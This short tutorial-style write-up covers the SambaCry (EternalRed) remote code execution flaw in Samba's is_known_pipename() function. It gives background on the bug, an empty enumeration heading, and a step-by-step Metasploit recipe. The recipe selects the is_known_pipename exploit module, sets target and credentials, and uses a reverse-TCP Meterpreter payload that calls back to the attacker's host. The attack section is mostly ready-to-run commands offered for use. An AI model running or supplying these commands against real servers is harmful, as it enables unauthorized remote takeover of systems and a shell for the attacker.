EternalRed (a.k.a. SambaCry) Exploit

Much like the EternalBlue exploit that was released in April 2017 after being stolen from the NSA, Samba was discovered to have a remote code execution vulnerability as well.

Samba version 3.5.0, the version that introduced the flaw, was released in March 2010. The bug causing this vulnerability is in the is_known_pipename() function.

Proof of Concept

Enumeration

Exploit

In the attacking machine, run msfconsole and set the following options

> use exploit/linux/samba/is_known_pipename
> set SMBUSER <username> (optional)
> set SMBPASS <password> (optional)
> set TARGET <target>
> set payload linux/x64/meterpreter/reverse_tcp
> set rhosts <target ip address>
> set lhost <your ip address>
> exploit